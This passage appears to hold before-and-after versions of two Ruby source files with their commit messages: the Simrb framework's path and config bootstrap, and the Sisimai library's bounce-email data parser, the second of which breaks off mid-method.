:module => 'modules/',
:public => 'public/',
:db_dir => 'db/',
:upload_dir => 'db/upload/',
:backup_dir => 'db/backup/',
:tmp_dir => 'tmp/',
:cache_dir => 'tmp/cache/simrb/',
:install_lock_file => 'tmp/install.lock',
:log_dir => 'log/',
:server_log => 'log/thin.log',
:command_log => 'log/command_error_log.html',
# sub path under module directory of project
:tool => '/tool/',
:logic => '/logic/',
:store => '/boxes/',
:lang => '/boxes/langs/',
:doc => '/boxes/docs/',
:schema => '/boxes/migrations/',
:install => '/boxes/installs/',
:modinfo => '/boxes/installs/_mods',
:vars => '/boxes/installs/_vars',
:menu => '/boxes/installs/_menu',
:tpl => '/boxes/tpls/',
:layout_css => '/boxes/tpls/layout.css',
:common_css => '/boxes/tpls/common.css',
:misc => '/boxes/misc/',
:gemfile => '/boxes/misc/Gemfile',
:view => '/views/',
:assets => '/views/assets/',
:gitignore => '/.gitignore',
:route => '/routes.rb',
:readme => '/README.md',
}
# default settings of scfg file
Scfg = {
:time_types => ['created', 'changed'],
:fixnum_types => ['order', 'level'],
:number_types => ['Fixnum', 'Integer', 'Float'],
:field_alias => {int:'Fixnum', str:'String', text:'Text', time:'Time', big:'Bignum', fl:'Float'},
:init_module_path => [:store, :lang, :schema, :install, :modinfo, :misc, :gemfile, :view, :assets, :readme, :route],
:init_root_path => [:db_dir, :upload_dir, :backup_dir, :tmp_dir, :log_dir, :module],
:environment => 'development', # or production, test
:only_enable_modules => [],
:disable_modules => [],
:encoding => 'utf-8',
:lang => 'en',
:install_lock => 'yes',
:db_connection => 'sqlite://db/data.db',
:server_log_mode => 'file',
:repo_source => 'https://github.com/',
:server => 'thin',
:bind => '0.0.0.0',
:port => 3000,
:init_scfg_item => [:lang, :db_connection, :environment, :bind, :port],
}
end
# load config file in shortcut pipe
Scfg = Simrb::Scfg
if File.exist? 'scfg'
Simrb.yaml_read('scfg').each do | k, v |
Scfg[k.to_sym] = v
end
end
# load path in shortcut pipe
Spath = Simrb::Spath
if File.exist? 'spath'
Simrb.yaml_read('spath').each do | k, v |
Spath[k.to_sym] = v
end
end
# load modules
Smodules = Simrb.load_module
improve path_init method
Sroot = Dir.pwd + '/'
module Simrb
# common methods
class << self
def yaml_read path
require 'yaml'
YAML.load_file path
rescue
[]
end
def yaml_write path, data
require "yaml"
File.open(path, 'w+') do | f |
f.write data.to_yaml
end
end
def p args
res = ""
if args.class.to_s == 'Array'
res = args.join("\n")
elsif args.class.to_s == 'Hash'
args.each do | k, v |
res << "#{k.to_s.ljust(15)} => #{v}\n"
end
res = res.chomp "\n"
else
res = args.to_s
end
puts "="*30 + "\n" + res + "\n" + "="*30
end
def load_module
dirs = []
module_ds = {}
# get the path of module
if Scfg[:only_enable_modules].empty?
dirs = Dir["#{Spath[:module]}*"]
else
Scfg[:only_enable_modules].each do | name |
path = "#{Spath[:module]}#{name}"
dirs << path if File.exist?(path)
end
end
# load the info of module
dirs.each do | path |
path = "#{path}#{Spath[:modinfo]}"
content = Simrb.yaml_read path
name = content[0]["name"]
order = (content[0]["order"] || 99)
module_ds[name] = order unless Scfg[:disable_modules].include?(name.to_s)
end
# sort the module by order field
res = []
module_ds = module_ds.sort_by { |k, v| v }
module_ds.each do | item |
res << item[0]
end
res
end
def path_init path
unless File.exist?(path)
path[-1] == '/' ? Dir.mkdir(path) : File.new(path, 'w')
end
end
def is_root_dir?
unless File.exist? 'scfg'
Simrb.p "Current command only allow to be used under root directory of project"
exit
end
end
# format the input argument from an array to two item,
# first item is orgin array, last is an hash option
#
# == Example
#
# args, opts = Simrb.format_input ["test", "test2", "--test", "--name=test2", "-n=test3"]
#
# the above is same as
#
# args, opts = Simrb.format_input ["--test", "test", "test2", "--name=test2", "-n=test3"]
#
# the options that starts with "-" you can write any positions of argument
#
# output
#
# args = ["test", "test2"]
# opts = {test: true, name: test2, n:test3}
#
def format_input args = []
resa = [] # return an array
resh = {} # return an hash
unless args.empty?
args.each do | item |
if item[0] == "-"
new_item = item.split("-").uniq.last
if new_item.index "="
key, val = new_item.split "="
resh[key.to_sym] = val
else
resh[new_item.to_sym] = true
end
else
resa << item
end
end
end
[resa, resh]
end
end
# basic path definition
Spath = {
# root path of project
:module => 'modules/',
:public => 'public/',
:db_dir => 'db/',
:upload_dir => 'db/upload/',
:backup_dir => 'db/backup/',
:tmp_dir => 'tmp/',
:cache_dir => 'tmp/cache/simrb/',
:install_lock_file => 'tmp/install.lock',
:log_dir => 'log/',
:server_log => 'log/thin.log',
:command_log => 'log/command_error_log.html',
# sub path under module directory of project
:tool => '/tool/',
:logic => '/logic/',
:store => '/boxes/',
:lang => '/boxes/langs/',
:doc => '/boxes/docs/',
:schema => '/boxes/migrations/',
:install => '/boxes/installs/',
:modinfo => '/boxes/installs/_mods',
:vars => '/boxes/installs/_vars',
:menu => '/boxes/installs/_menu',
:tpl => '/boxes/tpls/',
:layout_css => '/boxes/tpls/layout.css',
:common_css => '/boxes/tpls/common.css',
:misc => '/boxes/misc/',
:gemfile => '/boxes/misc/Gemfile',
:view => '/views/',
:assets => '/views/assets/',
:gitignore => '/.gitignore',
:route => '/routes.rb',
:readme => '/README.md',
}
# default settings of scfg file
Scfg = {
:time_types => ['created', 'changed'],
:fixnum_types => ['order', 'level'],
:number_types => ['Fixnum', 'Integer', 'Float'],
:field_alias => {int:'Fixnum', str:'String', text:'Text', time:'Time', big:'Bignum', fl:'Float'},
:init_module_path => [:store, :lang, :schema, :install, :modinfo, :misc, :gemfile, :view, :assets, :readme, :route],
:init_root_path => [:db_dir, :upload_dir, :backup_dir, :tmp_dir, :log_dir, :module],
:environment => 'development', # or production, test
:only_enable_modules => [],
:disable_modules => [],
:encoding => 'utf-8',
:lang => 'en',
:install_lock => 'yes',
:db_connection => 'sqlite://db/data.db',
:server_log_mode => 'file',
:repo_source => 'https://github.com/',
:server => 'thin',
:bind => '0.0.0.0',
:port => 3000,
:init_scfg_item => [:lang, :db_connection, :environment, :bind, :port],
}
end
# load config file in shortcut pipe
Scfg = Simrb::Scfg
if File.exist? 'scfg'
Simrb.yaml_read('scfg').each do | k, v |
Scfg[k.to_sym] = v
end
end
# load path in shortcut pipe
Spath = Simrb::Spath
if File.exist? 'spath'
Simrb.yaml_read('spath').each do | k, v |
Spath[k.to_sym] = v
end
end
# load modules
Smodules = Simrb.load_module
|
module Sisimai
# Sisimai::Data generate parsed data from Sisimai::Message object.
class Data
# Imported from p5-Sisimail/lib/Sisimai/Data.pm
require 'sisimai/address'
require 'sisimai/reason'
require 'sisimai/string'
require 'sisimai/rhost'
require 'sisimai/time'
require 'sisimai/datetime'
require 'sisimai/smtp/error'
@@rwaccessors = [
:catch, # [?] Results generated by hook method
:token, # [String] Message token/MD5 Hex digest value
:lhost, # [String] local host name/Local MTA
:rhost, # [String] Remote host name/Remote MTA
:alias, # [String] Alias of the recipient address
:listid, # [String] List-Id header of each ML
:reason, # [String] Bounce reason
:action, # [String] The value of Action: header
:subject, # [String] UTF-8 Subject text
:timestamp, # [Sisimai::Time] Date: header in the original message
:addresser, # [Sisimai::Address] From address
:recipient, # [Sisimai::Address] Recipient address which bounced
:messageid, # [String] Message-Id: header
:replycode, # [String] SMTP Reply Code
:smtpagent, # [String] Module(Engine) name
:softbounce, # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
:smtpcommand, # [String] The last SMTP command
:destination, # [String] The domain part of the "recipinet"
:senderdomain, # [String] The domain part of the "addresser"
:feedbacktype, # [String] Feedback Type
:diagnosticcode, # [String] Diagnostic-Code: Header
:diagnostictype, # [String] The 1st part of Diagnostic-Code: Header
:deliverystatus, # [String] Delivery Status(DSN)
:timezoneoffset, # [Integer] Time zone offset(seconds)
]
attr_accessor(*@@rwaccessors)
RetryIndex = Sisimai::Reason.retry
RFC822Head = Sisimai::RFC5322.HEADERFIELDS(:all)
AddrHeader = { addresser: RFC822Head[:addresser], recipient: RFC822Head[:recipient] }.freeze
# Constructor of Sisimai::Data
# @param [Hash] argvs Data
# @return [Sisimai::Data] Structured email data
def initialize(argvs)
# Create email address object
as = Sisimai::Address.make(argvs['addresser'])
ar = Sisimai::Address.make(address: argvs['recipient'])
return nil unless as.is_a? Sisimai::Address
return nil unless ar.is_a? Sisimai::Address
return nil if as.void
return nil if ar.void
@addresser = as
@recipient = ar
@senderdomain = as.host
@destination = ar.host
@alias = argvs['alias'] || ''
@token = Sisimai::String.token(as.address, ar.address, argvs['timestamp'])
@timestamp = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
@timezoneoffset = argvs['timezoneoffset'] || '+0000'
@lhost = argvs['lhost'] || ''
@rhost = argvs['rhost'] || ''
@catch = argvs['catch'] || nil
@reason = argvs['reason'] || ''
@listid = argvs['listid'] || ''
@subject = argvs['subject'] || ''
@messageid = argvs['messageid'] || ''
@smtpagent = argvs['smtpagent'] || ''
@diagnosticcode = argvs['diagnosticcode'] || ''
@diagnostictype = argvs['diagnostictype'] || ''
@deliverystatus = argvs['deliverystatus'] || ''
@smtpcommand = argvs['smtpcommand'] || ''
@feedbacktype = argvs['feedbacktype'] || ''
@action = argvs['action'] || ''
@replycode = argvs['replycode'] || ''
@replycode = Sisimai::SMTP::Reply.find(argvs['diagnosticcode']).to_s if @replycode.empty?
@softbounce = argvs['softbounce'] || ''
end
# Another constructor of Sisimai::Data
# @param [Sisimai::Message] data Data Object
# @param [Hash] argvs Parser options
# @options argvs [Boolean] delivered true: Including "delivered" reason
# @return [Array, Nil] List of Sisimai::Data or Nil if the
# argument is not Sisimai::Message object
def self.make(data: nil, **argvs)
return nil unless data
return nil unless data.is_a? Sisimai::Message
messageobj = data
rfc822data = messageobj.rfc822
fieldorder = { :recipient => [], :addresser => [] }
objectlist = []
givenorder = argvs[:order] || {}
delivered1 = argvs[:delivered] || false
return nil unless messageobj.ds
return nil unless messageobj.rfc822
require 'sisimai/smtp'
# Decide the order of email headers: user specified or system default.
if givenorder.is_a?(Hash) && !givenorder.empty?
# If the order of headers for searching is specified, use the order
# for detecting an email address.
fieldorder.each_key do |e|
# The order should be "Array Reference".
next unless givenorder[e]
next unless givenorder[e].is_a? Array
next if givenorder[e].empty?
fieldorder[e] += givenorder[e]
end
end
fieldorder.each_key do |e|
# If the order is empty, use default order.
next unless fieldorder[e].empty?
# Load default order of each accessor.
fieldorder[e] = AddrHeader[e]
end
eachobject = messageobj.ds.dup
while e = eachobject.shift do
# Create parameters for new() constructor.
p = {
'catch' => messageobj.catch || nil,
'lhost' => e['lhost'] || '',
'rhost' => e['rhost'] || '',
'alias' => e['alias'] || '',
'action' => e['action'] || '',
'reason' => e['reason'] || '',
'replycode' => e['replycode'] || '',
'smtpagent' => e['agent'] || '',
'recipient' => e['recipient'] || '',
'softbounce' => e['softbounce'] || '',
'smtpcommand' => e['command'] || '',
'feedbacktype' => e['feedbacktype'] || '',
'diagnosticcode' => e['diagnosis'] || '',
'diagnostictype' => e['spec'] || '',
'deliverystatus' => e['status'] || '',
}
unless delivered1
# Skip if the value of "deliverystatus" begins with "2." such as 2.1.5
next if p['deliverystatus'].start_with?('2.')
end
# EMAIL_ADDRESS:
# Detect email address from message/rfc822 part
fieldorder[:addresser].each do |f|
# Check each header in message/rfc822 part
next unless rfc822data[f]
next if rfc822data[f].empty?
j = Sisimai::Address.find(rfc822data[f]) || []
next if j.empty?
p['addresser'] = j[0]
break
end
unless p['addresser']
# Fallback: Get the sender address from the header of the bounced
# email if the address is not set at loop above.
j = Sisimai::Address.find(messageobj.header['to']) || []
p['addresser'] = j[0] unless j.empty?
end
next unless p['addresser']
next unless p['recipient']
# TIMESTAMP:
# Convert from a time stamp or a date string to a machine time.
datestring = nil
zoneoffset = 0
datevalues = []
datevalues << e['date'] unless e['date'].to_s.empty?
# Date information did not exist in message/delivery-status part,...
RFC822Head[:date].each do |f|
# Get the value of Date header or other date related header.
next unless rfc822data[f]
datevalues << rfc822data[f]
end
# Set "date" getting from the value of "Date" in the bounce message
datevalues << messageobj.header['date'] if datevalues.size < 2
while v = datevalues.shift do
# Parse each date value in the array
datestring = Sisimai::DateTime.parse(v)
break if datestring
end
if datestring && cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
# Get the value of timezone offset from datestring
# Wed, 26 Feb 2014 06:05:48 -0500
datestring = cv[1]
zoneoffset = Sisimai::DateTime.tz2second(cv[2])
p['timezoneoffset'] = cv[2]
end
begin
# Convert from the date string to an object then calculate time
# zone offset.
t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
rescue
warn ' ***warning: Failed to strptime ' << datestring.to_s
end
next unless p['timestamp']
# OTHER_TEXT_HEADERS:
recvheader = data.header['received'] || []
unless recvheader.empty?
# Get localhost and remote host name from Received header.
%w[lhost rhost].each { |a| e[a] ||= '' }
e['lhost'] = Sisimai::RFC5322.received(recvheader[0]).shift if e['lhost'].empty?
e['rhost'] = Sisimai::RFC5322.received(recvheader[-1]).pop if e['rhost'].empty?
end
# Remove square brackets and curly brackets from the host variable
%w[rhost lhost].each do |v|
p[v].delete!('[]()') # Remove square brackets and curly brackets from the host variable
p[v].sub!(/\A.+=/, '') # Remove string before "="
p[v].chomp!("\r") if p[v].end_with?("\r") # Remove CR at the end of the value
# Check space character in each value and get the first element
p[v] = p[v].split(' ', 2).shift if p[v].include?(' ')
p[v].chomp!('.') if p[v].end_with?('.') # Remove "." at the end of the value
end
# Subject: header of the original message
p['subject'] = rfc822data['subject'] || ''
p['subject'].scrub!('?')
p['subject'].chomp!("\r") if p['subject'].end_with?("\r")
# The value of "List-Id" header
p['listid'] = rfc822data['list-id'] || ''
unless p['listid'].empty?
# Get the value of List-Id header like "List name <list-id@example.org>"
if cv = p['listid'].match(/\A.*([<].+[>]).*\z/) then p['listid'] = cv[1] end
p['listid'].delete!('<>')
p['listid'].chomp!("\r") if p['listid'].end_with?("\r")
p['listid'] = '' if p['listid'].include?(' ')
end
# The value of "Message-Id" header
p['messageid'] = rfc822data['message-id'] || ''
unless p['messageid'].empty?
# Leave only string inside of angle brackets(<>)
if cv = p['messageid'].match(/\A([^ ]+)[ ].*/) then p['messageid'] = cv[1] end
if cv = p['messageid'].match(/[<]([^ ]+?)[>]/) then p['messageid'] = cv[1] end
end
# CHECK_DELIVERY_STATUS_VALUE:
# Cleanup the value of "Diagnostic-Code:" header
unless p['diagnosticcode'].empty?
# Count the number of D.S.N. and SMTP Reply Code
vs = Sisimai::SMTP::Status.find(p['diagnosticcode'])
vr = Sisimai::SMTP::Reply.find(p['diagnosticcode'])
vm = 0
re = nil
if vs
# How many times does the D.S.N. appeared
vm += p['diagnosticcode'].scan(/\b#{vs}\b/).size
p['deliverystatus'] = vs if vs =~ /\A[45][.][1-9][.][1-9]\z/
end
if vr
# How many times does the SMTP reply code appeared
vm += p['diagnosticcode'].scan(/\b#{vr}\b/).size
p['replycode'] ||= vr
end
if vm > 2
# Build regular expression for removing string like '550-5.1.1'
# from the value of "diagnosticcode"
re = %r/[ ]#{vr}[- ](?:#{vs})?/
# 550-5.7.1 [192.0.2.222] Our system has detected that this message is
# 550-5.7.1 likely unsolicited mail. To reduce the amount of spam sent to Gmail,
# 550-5.7.1 this message has been blocked. Please visit
# 550 5.7.1 https://support.google.com/mail/answer/188131 for more information.
p['diagnosticcode'] = Sisimai::String.sweep(p['diagnosticcode'].gsub(re, ' '))
end
end
p['diagnostictype'] ||= 'X-UNIX' if p['reason'] == 'mailererror'
p['diagnostictype'] ||= 'SMTP' unless %w[feedback vacation].include?(p['reason'])
# Check the value of SMTP command
p['smtpcommand'] = '' unless %w[EHLO HELO MAIL RCPT DATA QUIT].include?(p['smtpcommand'])
if p['action'].empty?
# Check the value of "action"
if p['reason'] == 'expired'
# Action: delayed
p['action'] = 'delayed'
elsif p['deliverystatus'].start_with?('5', '4')
# Action: failed
p['action'] = 'failed'
end
end
o = Sisimai::Data.new(p)
next unless o.recipient
if o.reason.empty? || RetryIndex[o.reason]
# Decide the reason of email bounce
r = ''
r = Sisimai::Rhost.get(o) if Sisimai::Rhost.match(o.rhost) # Remote host dependent error
r = Sisimai::Reason.get(o) if r.empty?
r = 'undefined' if r.empty?
o.reason = r
end
if %w[delivered feedback vacation].include?(o.reason)
# The value of reason is "vacation" or "feedback"
o.softbounce = -1
o.replycode = '' unless o.reason == 'delivered'
else
# Bounce message which reason is "feedback" or "vacation" does
# not have the value of "deliverystatus".
softorhard = nil
if o.softbounce.to_s.empty?
# The value is not set yet
textasargv = (p['deliverystatus'] + ' ' + p['diagnosticcode']).lstrip
softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, textasargv) || ''
o.softbounce = if softorhard.size > 0
# Returned value is "soft" or "hard"
(softorhard == 'soft') ? 1 : 0
else
# Returned value is an empty string
-1
end
end
if o.deliverystatus.empty?
# Set pseudo status code
textasargv = (o.replycode + ' ' + p['diagnosticcode']).lstrip
getchecked = Sisimai::SMTP::Error.is_permanent(textasargv)
tmpfailure = getchecked.nil? ? false : (getchecked ? false : true)
if pseudocode = Sisimai::SMTP::Status.code(o.reason, tmpfailure)
# Set the value of "deliverystatus" and "softbounce"
o.deliverystatus = pseudocode
if o.softbounce < 0
# set the value of "softbounce" again when the value is -1
softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, pseudocode)
o.softbounce = if softorhard.size > 0
# Returned value is "soft" or "hard"
softorhard == 'soft' ? 1 : 0
else
# Returned value is an empty string
-1
end
end
end
end
unless o.replycode.empty?
# Check both of the first digit of "deliverystatus" and "replycode"
o.replycode = '' unless o.replycode[0, 1] == o.deliverystatus[0, 1]
end
end
objectlist << o
end
return objectlist
end
# Convert from object to hash reference
# @return [Hash] Data in Hash reference
def damn
data = {}
@@rwaccessors.each do |e|
next if %w[addresser recipient timestamp].include?(e.to_s)
data[e.to_s] = self.send(e) || ''
end
data['addresser'] = self.addresser.address
data['recipient'] = self.recipient.address
data['timestamp'] = self.timestamp.to_time.to_i
return data
end
alias :to_hash :damn
# Data dumper
# @param [String] type Data format: json, yaml
# @return [String, Nil] Dumped data or nil if the value of the first
# argument is neither "json" nor "yaml"
def dump(type = 'json')
return nil unless %w[json yaml].include?(type)
referclass = 'Sisimai::Data::' << type.upcase
begin
require referclass.downcase.gsub('::', '/')
rescue
warn '***warning: Failed to load' << referclass
end
dumpeddata = Module.const_get(referclass).dump(self)
return dumpeddata
end
# JSON handler
# @return [String] JSON string converted from Sisimai::Data
def to_json(*)
return self.dump('json')
end
end
end
Sisimai::SMTP is not used
module Sisimai
# Sisimai::Data generate parsed data from Sisimai::Message object.
class Data
# Imported from p5-Sisimail/lib/Sisimai/Data.pm
require 'sisimai/address'
require 'sisimai/reason'
require 'sisimai/string'
require 'sisimai/rhost'
require 'sisimai/time'
require 'sisimai/datetime'
require 'sisimai/smtp/error'
@@rwaccessors = [
:catch, # [?] Results generated by hook method
:token, # [String] Message token/MD5 Hex digest value
:lhost, # [String] local host name/Local MTA
:rhost, # [String] Remote host name/Remote MTA
:alias, # [String] Alias of the recipient address
:listid, # [String] List-Id header of each ML
:reason, # [String] Bounce reason
:action, # [String] The value of Action: header
:subject, # [String] UTF-8 Subject text
:timestamp, # [Sisimai::Time] Date: header in the original message
:addresser, # [Sisimai::Address] From address
:recipient, # [Sisimai::Address] Recipient address which bounced
:messageid, # [String] Message-Id: header
:replycode, # [String] SMTP Reply Code
:smtpagent, # [String] Module(Engine) name
:softbounce, # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
:smtpcommand, # [String] The last SMTP command
:destination, # [String] The domain part of the "recipinet"
:senderdomain, # [String] The domain part of the "addresser"
:feedbacktype, # [String] Feedback Type
:diagnosticcode, # [String] Diagnostic-Code: Header
:diagnostictype, # [String] The 1st part of Diagnostic-Code: Header
:deliverystatus, # [String] Delivery Status(DSN)
:timezoneoffset, # [Integer] Time zone offset(seconds)
]
attr_accessor(*@@rwaccessors)
RetryIndex = Sisimai::Reason.retry
RFC822Head = Sisimai::RFC5322.HEADERFIELDS(:all)
AddrHeader = { addresser: RFC822Head[:addresser], recipient: RFC822Head[:recipient] }.freeze
# Constructor of Sisimai::Data
# @param [Hash] argvs Data
# @return [Sisimai::Data] Structured email data
def initialize(argvs)
# Create email address object
as = Sisimai::Address.make(argvs['addresser'])
ar = Sisimai::Address.make(address: argvs['recipient'])
return nil unless as.is_a? Sisimai::Address
return nil unless ar.is_a? Sisimai::Address
return nil if as.void
return nil if ar.void
@addresser = as
@recipient = ar
@senderdomain = as.host
@destination = ar.host
@alias = argvs['alias'] || ''
@token = Sisimai::String.token(as.address, ar.address, argvs['timestamp'])
@timestamp = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
@timezoneoffset = argvs['timezoneoffset'] || '+0000'
@lhost = argvs['lhost'] || ''
@rhost = argvs['rhost'] || ''
@catch = argvs['catch'] || nil
@reason = argvs['reason'] || ''
@listid = argvs['listid'] || ''
@subject = argvs['subject'] || ''
@messageid = argvs['messageid'] || ''
@smtpagent = argvs['smtpagent'] || ''
@diagnosticcode = argvs['diagnosticcode'] || ''
@diagnostictype = argvs['diagnostictype'] || ''
@deliverystatus = argvs['deliverystatus'] || ''
@smtpcommand = argvs['smtpcommand'] || ''
@feedbacktype = argvs['feedbacktype'] || ''
@action = argvs['action'] || ''
@replycode = argvs['replycode'] || ''
@replycode = Sisimai::SMTP::Reply.find(argvs['diagnosticcode']).to_s if @replycode.empty?
@softbounce = argvs['softbounce'] || ''
end
# Another constructor of Sisimai::Data
# @param [Sisimai::Message] data Data Object
# @param [Hash] argvs Parser options
# @options argvs [Boolean] delivered true: Including "delivered" reason
# @return [Array, Nil] List of Sisimai::Data or Nil if the
# argument is not Sisimai::Message object
def self.make(data: nil, **argvs)
return nil unless data
return nil unless data.is_a? Sisimai::Message
messageobj = data
rfc822data = messageobj.rfc822
fieldorder = { :recipient => [], :addresser => [] }
objectlist = []
givenorder = argvs[:order] || {}
delivered1 = argvs[:delivered] || false
return nil unless messageobj.ds
return nil unless messageobj.rfc822
# Decide the order of email headers: user specified or system default.
if givenorder.is_a?(Hash) && !givenorder.empty?
# If the order of headers for searching is specified, use the order
# for detecting an email address.
fieldorder.each_key do |e|
# The order should be "Array Reference".
next unless givenorder[e]
next unless givenorder[e].is_a? Array
next if givenorder[e].empty?
fieldorder[e] += givenorder[e]
end
end
fieldorder.each_key do |e|
# If the order is empty, use default order.
next unless fieldorder[e].empty?
# Load default order of each accessor.
fieldorder[e] = AddrHeader[e]
end
eachobject = messageobj.ds.dup
while e = eachobject.shift do
# Create parameters for new() constructor.
p = {
'catch' => messageobj.catch || nil,
'lhost' => e['lhost'] || '',
'rhost' => e['rhost'] || '',
'alias' => e['alias'] || '',
'action' => e['action'] || '',
'reason' => e['reason'] || '',
'replycode' => e['replycode'] || '',
'smtpagent' => e['agent'] || '',
'recipient' => e['recipient'] || '',
'softbounce' => e['softbounce'] || '',
'smtpcommand' => e['command'] || '',
'feedbacktype' => e['feedbacktype'] || '',
'diagnosticcode' => e['diagnosis'] || '',
'diagnostictype' => e['spec'] || '',
'deliverystatus' => e['status'] || '',
}
unless delivered1
# Skip if the value of "deliverystatus" begins with "2." such as 2.1.5
next if p['deliverystatus'].start_with?('2.')
end
# EMAIL_ADDRESS:
# Detect email address from message/rfc822 part
fieldorder[:addresser].each do |f|
# Check each header in message/rfc822 part
next unless rfc822data[f]
next if rfc822data[f].empty?
j = Sisimai::Address.find(rfc822data[f]) || []
next if j.empty?
p['addresser'] = j[0]
break
end
unless p['addresser']
# Fallback: Get the sender address from the header of the bounced
# email if the address is not set at loop above.
j = Sisimai::Address.find(messageobj.header['to']) || []
p['addresser'] = j[0] unless j.empty?
end
next unless p['addresser']
next unless p['recipient']
# TIMESTAMP:
# Convert from a time stamp or a date string to a machine time.
datestring = nil
zoneoffset = 0
datevalues = []
datevalues << e['date'] unless e['date'].to_s.empty?
# Date information did not exist in message/delivery-status part,...
RFC822Head[:date].each do |f|
# Get the value of Date header or other date related header.
next unless rfc822data[f]
datevalues << rfc822data[f]
end
# Set "date" getting from the value of "Date" in the bounce message
datevalues << messageobj.header['date'] if datevalues.size < 2
while v = datevalues.shift do
# Parse each date value in the array
datestring = Sisimai::DateTime.parse(v)
break if datestring
end
if datestring && cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
# Get the value of timezone offset from datestring
# Wed, 26 Feb 2014 06:05:48 -0500
datestring = cv[1]
zoneoffset = Sisimai::DateTime.tz2second(cv[2])
p['timezoneoffset'] = cv[2]
end
begin
# Convert from the date string to an object then calculate time
# zone offset.
t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
rescue
warn ' ***warning: Failed to strptime ' << datestring.to_s
end
next unless p['timestamp']
# OTHER_TEXT_HEADERS:
recvheader = data.header['received'] || []
unless recvheader.empty?
# Get localhost and remote host name from Received header.
%w[lhost rhost].each { |a| e[a] ||= '' }
e['lhost'] = Sisimai::RFC5322.received(recvheader[0]).shift if e['lhost'].empty?
e['rhost'] = Sisimai::RFC5322.received(recvheader[-1]).pop if e['rhost'].empty?
end
# Remove square brackets and curly brackets from the host variable
%w[rhost lhost].each do |v|
p[v].delete!('[]()') # Remove square brackets and curly brackets from the host variable
p[v].sub!(/\A.+=/, '') # Remove string before "="
p[v].chomp!("\r") if p[v].end_with?("\r") # Remove CR at the end of the value
# Check space character in each value and get the first element
p[v] = p[v].split(' ', 2).shift if p[v].include?(' ')
p[v].chomp!('.') if p[v].end_with?('.') # Remove "." at the end of the value
end
# Subject: header of the original message
p['subject'] = rfc822data['subject'] || ''
p['subject'].scrub!('?')
p['subject'].chomp!("\r") if p['subject'].end_with?("\r")
# The value of "List-Id" header
p['listid'] = rfc822data['list-id'] || ''
unless p['listid'].empty?
# Get the value of List-Id header like "List name <list-id@example.org>"
if cv = p['listid'].match(/\A.*([<].+[>]).*\z/) then p['listid'] = cv[1] end
p['listid'].delete!('<>')
p['listid'].chomp!("\r") if p['listid'].end_with?("\r")
p['listid'] = '' if p['listid'].include?(' ')
end
# The value of "Message-Id" header
p['messageid'] = rfc822data['message-id'] || ''
unless p['messageid'].empty?
# Leave only string inside of angle brackets(<>)
if cv = p['messageid'].match(/\A([^ ]+)[ ].*/) then p['messageid'] = cv[1] end
if cv = p['messageid'].match(/[<]([^ ]+?)[>]/) then p['messageid'] = cv[1] end
end
# CHECK_DELIVERY_STATUS_VALUE:
# Cleanup the value of "Diagnostic-Code:" header
unless p['diagnosticcode'].empty?
# Count the number of D.S.N. and SMTP Reply Code
vs = Sisimai::SMTP::Status.find(p['diagnosticcode'])
vr = Sisimai::SMTP::Reply.find(p['diagnosticcode'])
vm = 0
re = nil
if vs
# How many times does the D.S.N. appeared
vm += p['diagnosticcode'].scan(/\b#{vs}\b/).size
p['deliverystatus'] = vs if vs =~ /\A[45][.][1-9][.][1-9]\z/
end
if vr
# How many times does the SMTP reply code appeared
vm += p['diagnosticcode'].scan(/\b#{vr}\b/).size
p['replycode'] ||= vr
end
if vm > 2
# Build regular expression for removing string like '550-5.1.1'
# from the value of "diagnosticcode"
re = %r/[ ]#{vr}[- ](?:#{vs})?/
# 550-5.7.1 [192.0.2.222] Our system has detected that this message is
# 550-5.7.1 likely unsolicited mail. To reduce the amount of spam sent to Gmail,
# 550-5.7.1 this message has been blocked. Please visit
# 550 5.7.1 https://support.google.com/mail/answer/188131 for more information.
p['diagnosticcode'] = Sisimai::String.sweep(p['diagnosticcode'].gsub(re, ' '))
end
end
p['diagnostictype'] ||= 'X-UNIX' if p['reason'] == 'mailererror'
p['diagnostictype'] ||= 'SMTP' unless %w[feedback vacation].include?(p['reason'])
# Check the value of SMTP command
p['smtpcommand'] = '' unless %w[EHLO HELO MAIL RCPT DATA QUIT].include?(p['smtpcommand'])
if p['action'].empty?
# Check the value of "action"
if p['reason'] == 'expired'
# Action: delayed
p['action'] = 'delayed'
elsif p['deliverystatus'].start_with?('5', '4')
# Action: failed
p['action'] = 'failed'
end
end
o = Sisimai::Data.new(p)
next unless o.recipient
if o.reason.empty? || RetryIndex[o.reason]
# Decide the reason of email bounce
r = ''
r = Sisimai::Rhost.get(o) if Sisimai::Rhost.match(o.rhost) # Remote host dependent error
r = Sisimai::Reason.get(o) if r.empty?
r = 'undefined' if r.empty?
o.reason = r
end
if %w[delivered feedback vacation].include?(o.reason)
# The value of reason is "vacation" or "feedback"
o.softbounce = -1
o.replycode = '' unless o.reason == 'delivered'
else
# Bounce message which reason is "feedback" or "vacation" does
# not have the value of "deliverystatus".
softorhard = nil
if o.softbounce.to_s.empty?
# The value is not set yet
textasargv = (p['deliverystatus'] + ' ' + p['diagnosticcode']).lstrip
softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, textasargv) || ''
o.softbounce = if softorhard.size > 0
# Returned value is "soft" or "hard"
(softorhard == 'soft') ? 1 : 0
else
# Returned value is an empty string
-1
end
end
if o.deliverystatus.empty?
# Set pseudo status code
textasargv = (o.replycode + ' ' + p['diagnosticcode']).lstrip
getchecked = Sisimai::SMTP::Error.is_permanent(textasargv)
tmpfailure = getchecked.nil? ? false : (getchecked ? false : true)
if pseudocode = Sisimai::SMTP::Status.code(o.reason, tmpfailure)
# Set the value of "deliverystatus" and "softbounce"
o.deliverystatus = pseudocode
if o.softbounce < 0
# set the value of "softbounce" again when the value is -1
softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, pseudocode)
o.softbounce = if softorhard.size > 0
# Returned value is "soft" or "hard"
softorhard == 'soft' ? 1 : 0
else
# Returned value is an empty string
-1
end
end
end
end
unless o.replycode.empty?
# Check both of the first digit of "deliverystatus" and "replycode"
